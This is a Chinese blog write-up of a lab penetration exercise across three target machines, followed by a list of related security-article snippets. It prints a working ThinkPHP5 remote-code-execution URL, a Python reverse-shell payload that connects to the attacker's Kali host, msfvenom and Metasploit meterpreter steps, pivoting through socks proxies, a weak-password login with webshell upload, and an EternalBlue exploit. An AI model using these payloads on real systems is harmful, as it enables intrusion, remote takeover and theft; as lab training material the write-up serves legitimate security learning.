记一次从web到内网的渗透

2023-11-10

记一次从web到内网的渗透

拓扑图

环境介绍

现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,最终要成功获得三台主机权限

渗透过程

target1

使用nmap进行扫描

可以看到开启了80端口
浏览器访问目标靶机80端口

可以看到就是apache的默认页面
使用dirb进行目录结构扫描

发现public页面

可以看到是thinkphp5搭建的网站,thinkphp5曾经爆过一个远程代码执行的漏洞,直接上网站寻找payload验证是否存在漏洞

http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id


可以看到确实存在漏洞,现在可以向网站里面写入一句话木马,然后用蚁剑去连接,这是一种方法,但是也可以直接去尝试反弹一个shell到kali上

kali上执行:nc -lvvp 4444
浏览器中执行:http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.109.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);

可以看到kali这边成功反弹到了一个shell

使用python生成一个交互式的shell

查找一下flag

成功获得第一个flag
使用msfvenom生成一个反向的shellcode

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.109.128 lport=5555 -f elf > msf.elf


使用python开启一个临时http服务

靶机下载该shellcode

然后kali打开msf,进行监听

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lport 5555
set lhost 192.168.109.128
exploit


然后靶机上给予shellcode执行的权限后执行该文件

可以看到kali这边成功返回一个meterpreter

查看一下网络配置

可以看到target1还存在一个网段
添加路由表

配置socks代理

use auxiliary/server/socks_proxy
exploit


配置proxychains代理链

vim /etc/proxychains4.conf

target2

扫描10.1.1.0/24这个网段是否还存在其他机器

use auxiliary/scanner/portscan/tcp
set rhosts 10.1.1.0/24
set ports 1-1000
set threads 50
exploit


可以看到该网段还存在一台机器为10.1.1.150
使用nmap扫描10.1.1.150开放端口

proxychains4 nmap -Pn -sT 10.1.1.150


可以看到也开放了80端口
这里直接用浏览器去访问10.1.1.150的80端口显然是不行的,不过火狐浏览器也是支持socks代理的

再次访问网站

查看robots.txt文件

找到后台登入位置

直接使用弱密码admin:admin登入成功

成功获得第二个flag,找到模板位置,发现里面的源码都是可以编辑的

写入一句话木马

然后使用蚁剑去连接,当然直接去连接肯定也是不行的,不过蚁剑也是支持代理设置的

之后再正常去连接就行了,但是我这里不知道是环境问题还是蚁剑的问题,正常来说这里是肯定能连接成功的,我试了很多遍都没有成功,然后想着直接把那个页面里面的源码直接换为大马,也是不行的,因为一般大马都是经过作者编译过了,直接复制过去肯定会有问题,最后只能直接将大马事先准备在了网站根目录下面,这里主要是为了体现内网渗透,所以这里也不细说
访问大马

使用msfvenom生成一个正向连接的shellcode

msfvenom -p windows/meterpreter/bind_tcp lport=6666 -f exe -o 1.exe


然后通过大马将shellcode上传到目标服务器

然后再次进入之前打开的msf

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set lport 6666
set rhost 10.1.1.150
exploit


然后在大马上执行上传的shellcode

可以看到kali这边成功返回了一个meterpreter

查看网络配置

可以看到还有一个网段10.1.2.0/24
将路由添加到路由表

run post/multi/manage/autoroute

taget3

扫描10.1.2.0/24网段是否还存在其他机器

use auxiliary/scanner/portscan/tcp
set rhosts 10.1.2.0/24
set ports 1-1000
set threads 100
exploit


这里扫描实在太慢,这个网段还有一个机器IP为10.1.2.250
然后再添加一层socks代理

use auxiliary/server/socks_proxy
set srvport 2222
exploit


配置proxychains代理链

vim /etc/proxychains4.conf


使用nmap进行端口扫描

proxychains4 nmap -Pn -sT 10.1.2.250


根据扫描结果判断操作系统为windows
再使用nmap的漏扫脚本进行扫描

proxychains4 nmap --script=vuln 10.1.2.250


可以看到存在ms17-010,直接上msf寻找攻击模块

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.1.2.250
exploit


查找一下flag

三台主机的权限全部拿下,所有flag查找完毕,至此,渗透结束

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

记一次从web到内网的渗透 的相关文章

  • SQL注入-堆叠注入

    SQL注入 堆叠注入 原理 数据库支持堆叠查询 所谓堆叠查询就是执行多条语句 语句以 隔开 并且代码使用了支持堆叠查询的函数 列如PHP的mysqli multi query 堆叠注入就是在第二条语句中构造payload 注 页面只返回第一
  • 使用wireshark对HTTPS解密

    最近需要解析HTTPS流量 所以对wireshark的HTTPS解密进行了实测 使用wireshark解密https的方法 方法一 1 在wireshark的首选项中的protocols的tls选项里添加服务器私钥文件 p12文件需要填写密
  • ctfshow-WEB-web14( 利用数据库读写功能读取网站敏感文件)

    ctf show WEB模块第14关是一个SQL注入漏洞 绕过switch循环后可以拿到一个登录界面 登录界面存在SQL注入 脱库以后会提示flag在另一个文件中 利用数据库的文件读写功能读取文件内容即可拿到flag 开局是一个switch
  • 渗透测试信息收集

    信息收集 渗透的本质是信息收集 信息收集分为主动信息收集和被动信息收集 主动信息收集能够收集到更多的信息 但是会产生痕迹 容易被溯源 被动信息收集是信息收集的第一步 通过第三方工具进行收集 不与主机直接交互 需要收集的信息包括 域名 子域名
  • 看完这篇 教你玩转渗透测试靶机vulnhub——BossplayersCTF

    Vulnhub靶机BBossplayersCTF渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 命令执行漏洞 反弹shell suid提权 获取flag Vulnh
  • 超详细的VSCode下载和安装教程(非常详细)从零基础入门到精通,看完这一篇就够了。

    文章目录 1 引言 2 下载VSCode 3 解决VSCode下载速度特别慢 4 安装VSCode 1 引言 今天用WebStorm运行前端代码时 发现不太好打断点 于是 打算改用VSCode来运行前端代码 但前提是要安装VSCode 如下
  • kali学习4——使用msfvenom制作exe木马

    使用msfvenom制作exe木马文件 1 msfvenom msfvenom是msfpayload msfencode的结合体 使用msfvenom制作木马的思路是 木马在目标机上执行后 向本机发送信息 而本机则需要开启监听状态 收到信息
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1

    Vulnhub靶机Grotesque 3 0 1渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 信息收集 漏洞发现 LFI漏洞利用 本地文件包含漏洞 SSH登入 提权 获取FLAG Vulnhub靶机渗
  • 计算机大四找不到工作怎么办?应届生如何找到合适的工作?

    计算机大四找不到工作怎么办呢 金三银四的到来 很多大四计算机专业学生最近很是焦虑 自己在校成绩不够突出 技术实力也是平平 投递了很多企业迟迟得不到反馈 眼看着毕业季越来越靠近 身边同学都已获得大厂offer 而自己手上一个offer都没有
  • 渗透测试--medium_socnet

    靶机下载地址 https download vulnhub com boredhackerblog medium socnet ova 实验环境 Kali IP 192 168 172 134 靶机 medium socnet 主机发现 a
  • 渗透测试常用浏览器插件汇总

    1 shodan 这个插件可以自动探测当前网站所属的国家 城市 解析IP地址以及开放的服务和端口 包括但不限于FTP DNS SSH或者其他服务等 属被动信息搜集中的一种 2 hackbar 收费之后用Max Hackerbar代替 这个插
  • 使用tar --checkpoint提权操作 详解--checkpoint-action的参数及作用

    如果管理员给予了某个普通用户tar命令的超级管理员操作 那么我们可以使用tar命令进行提权 命令如下 sudo u root tar cf dev null exploit checkpoint 1 checkpoint action ex
  • redis未授权访问漏洞利用+redis日志分析

    redis未授权访问漏洞利用 redis日志分析 redis未授权访问 远程连接redis kali redis cli h IP redis常用语句 set key value 设置键值对 get key 获得值 incr intkey
  • 【centos8.2下载安装netcat监听工具】——关注紫灵小姐姐不踩坑

    下载 wget https sourceforge net projects netcat files netcat 0 7 1 netcat 0 7 1 tar gz 解压 安装 cd netcat 0 7 1 configure 如果报
  • 渗透测试——cookie注入

    1 cookie注入原理 Cookie最先是由Netscape 网景 公司提出的 Netscape官方文档中对Cookie的定义是这样的 Cookie是在HTTP协议下 服务器或脚本可以维护客户工作站上信息的一种方式 Cookie的用途非常
  • Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246)

    漏洞简介 RocketMQ 5 1 0及以下版本 在一定条件下 存在远程命令执行风险 RocketMQ的NameServer Broker Controller等多个组件外网泄露 缺乏权限验证 攻击者可以利用该漏洞利用更新配置功能以Rock
  • Xray工具使用(一)

    xray简介 xray 是一款功能强大的安全评估工具 主要特性有 检测速度快 发包速度快 漏洞检测算法高效 支持范围广 大至 OWASP Top 10 通用漏洞检测 小至各种 CMS 框架 POC 均可以支持 代码质量高 编写代码的人员素质
  • DVWA安装配置教程

    原文传送门 http www cnblogs com yaochc p 5049832 html DVWA 安装教程 1 直接下载WampServer 免去了需要安装apache php mysql的服务器软件的痛苦 一体集成 相当于安装了
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)

    Vulnhub靶机HarryPotter Aragog渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 漏洞发现 漏洞利用 数据库语句查询 SSH登入 备份文件提权
  • 总结 BurpSuite 插件 HaE 与 Authz 用法!!!

    HaE与Authz均为BurpSuite插件生态的一员 两者搭配可以避免 越权 未授权 两类漏洞的重复测试行为 适用于业务繁杂 系统模块功能多的场景 两个插件都可以在store里安装 安装完后 点击Filter Settings勾选Show

随机推荐

  • 随机抽人名小程序_年会必备,5分钟学会制作抽奖小程序

    每次年会 都希望人品爆发 中个大奖 可惜这么多年过去了 依然没中过大奖 你是不是跟卢子一样 抽奖的形式有多种 在Excel中也可以制作一个抽奖小程序 现在从A列成员中抽取3名中奖人员 效果如动图 抽奖都是随机生成的 要借助随机数 随机数有两
  • 数据库和AI的一次火花

    欢迎大家前往腾讯云 社区 获取更多腾讯海量技术实践干货哦 本文由宗文 发表于云 社区专栏 导语 通过历史数据 基于时间序列来预测未来 我们生活中很多数据是有时间维度的 比如说天气或者股票价格 对于这种带有时序的数据 有一种基于时间序列的预测
  • linux 下如何配置JDK呢?

    系统Ubuntu 下载jdk 9 0 1 1 切换到root 创建文件夹 xxxx ubuntu sudo su root ubuntu mkdir usr java 2 找到下载的jdk 9 0 1 linux x64 bin tar g
  • 【Shell-Kill】Kill掉Linux进程以及Kill掉Yarn任务

    Shell Kill Kill掉Linux进程以及Kill掉Yarn任务 1 使用 awk 方式 kill Linux 进程 2 使用 Shell 脚本批量处理 Yarn 任务 2 1 使用 Shell 脚本批量查看 Yarn 任务数量 2
  • Hibernate框架详解(三)

    表与表之间的关系 1 一对一 例子 在中国 一个男人只能有一个妻子 一个女人只能有一个丈夫 2 一对多 例子 学生和班级的关系 一个班级可以有多个学生 而一个学生只能属于一个班级 一对多建表 通过外键建立关系 在多的那一方创建字段作为外键
  • Android TV RecyclerView 焦点处理及获取焦点的Item保持在中间

    原生RecyclerView 在Tv中的焦点处理很不好 经常找不到焦点或者焦点丢失 原因是因为当item未显示时即未加载时时不能获取焦点的 所以当我们按上下键时经常丢失焦点或者焦点乱跳 要解决这个问题我们必须要手动控制RecyclerVie
  • JavaScript 输入内容表单规则验证

    1 电子邮箱格式 function emailCheck data let str a zA Z0 9 a zA Z0 9 a zA Z0 9 0 61 a zA Z0 9 a zA Z0 9 a zA Z0 9 0 61 a zA Z0
  • Mybatis框架全面详解

    MyBatis的基本使用 第一章 MyBatis的概念 第二章 MyBtais的基本使用 2 1 环境的搭建 2 1 1 物理建模 2 1 2 逻辑建模 2 1 3 搭建框架开发环境 2 1 3 1 junit框架 2 1 3 2 log4
  • 前端笔记之JavaScript(三)关于条件判断语句、循环语句那点事

    一 条件分支语句 条件分支语句 也叫作条件判断语句 就是根据某种条件执行某些语句 不执行某些语句 JS中有三种语法是可以表示条件分支的 1 1 if else 条件分支的主力语法 这个主力语法能够书写所有的条件分支语句 也就是说 一会儿学s
  • DFS 显示n个数中选取i(0~n)个数的情况

    include
  • 面试之JVM的储存空间

    Java8之后 取消了整个永久代区域 取而代之的是元空间 运行时常量池和静态常量池存放在元空间中 而字符串常量池依然存放在堆中 JVM允许时数据区 程序计数器的特点以及作用 1 程序计数器 是一块较小的内存空间 2 是当前线程所指向的字节码
  • Maven 快照(SNAPSHOT)

    一个大型的软件应用通常包含多个模块 并且通常的场景是多个团队开发同一应用的不同模块 举个例子 设想一个团队开发应用的前端 项目为 app ui app ui jar 1 0 而另一个团队开发应用的后台 使用的项目是 data service
  • 【异常】java: 警告: 源发行版 11 需要目标发行版 11

    写在前面 笔者遇到的问题比较极端 在阅读之前建议检查是否是项目结构中语言级别和jdk版本不匹配的问题 确认并非语言级别级别问题再阅读以下 先说结论 idea 的 配置文件iml 与项目中 配置 的jdk版本不一致 排查 iml 文件 检查L
  • CSS3设置flex,图片的高度被自适应了

    如图所示 因为给最内存的图片宽度设置了width 100 会寻找上一级的高度 上一级没设置会自动寻找父元素 父元素的宽度为整个页面 所以img宽度为父元素宽度的6分之一 自然高度也会自适应变小了 设置width 600自然就能恢复高度了
  • PHP+JavaScript+HTML实现上传PDF和浏览PDF课件

    在寒假简单制作PHP网站时 需要实现在线浏览PDF和上传PDF的简单功能 下面就简单介绍下该功能 实现效果如下图所示 1 当用户登录后 点击 上传课件 超链接可以实现隐藏和显示上传table的功能 2 当用户选择上传的课件后 PDF上传至本
  • Mybatis -maven插件方式自动生成pojo,mapper文件代码(generatorConfig.xml)

    1 新建springboot工程 添加maven依赖
  • python为字体添加上下标

    添加上标 添加下标 举例 import numpy as np import matplotlib pyplot as plt t np linspace 0 10 1000 y np sin t plt plot t y plt xlab
  • 基于线性表的图书管理系统(java)

    目录 1 简介 2 代码 1 ManageSystem类 2 book类 3 测试程序运行结果截图 1 登录和创建 2 输出 3 查找 4 插入 5 删除 6 修改 7 排序 8 计数 9 导出 10 读入 11 菜单 4 存在的问题与思考
  • 零阶矩、一阶矩、二阶矩、三阶矩

    参考 Moment mathematics Wikipedia 此处截取其中的一段 In mathematics a moment is a specific quantitative measure used in both mechan
  • 记一次从web到内网的渗透

    记一次从web到内网的渗透 拓扑图 环境介绍 现在有三台机器 分别为target1 target2 target3 里面分别有三个flag 每个flag的分值不同 需要通过拿下一个已知IP target1 进而向内网里面进行渗透 最终要成功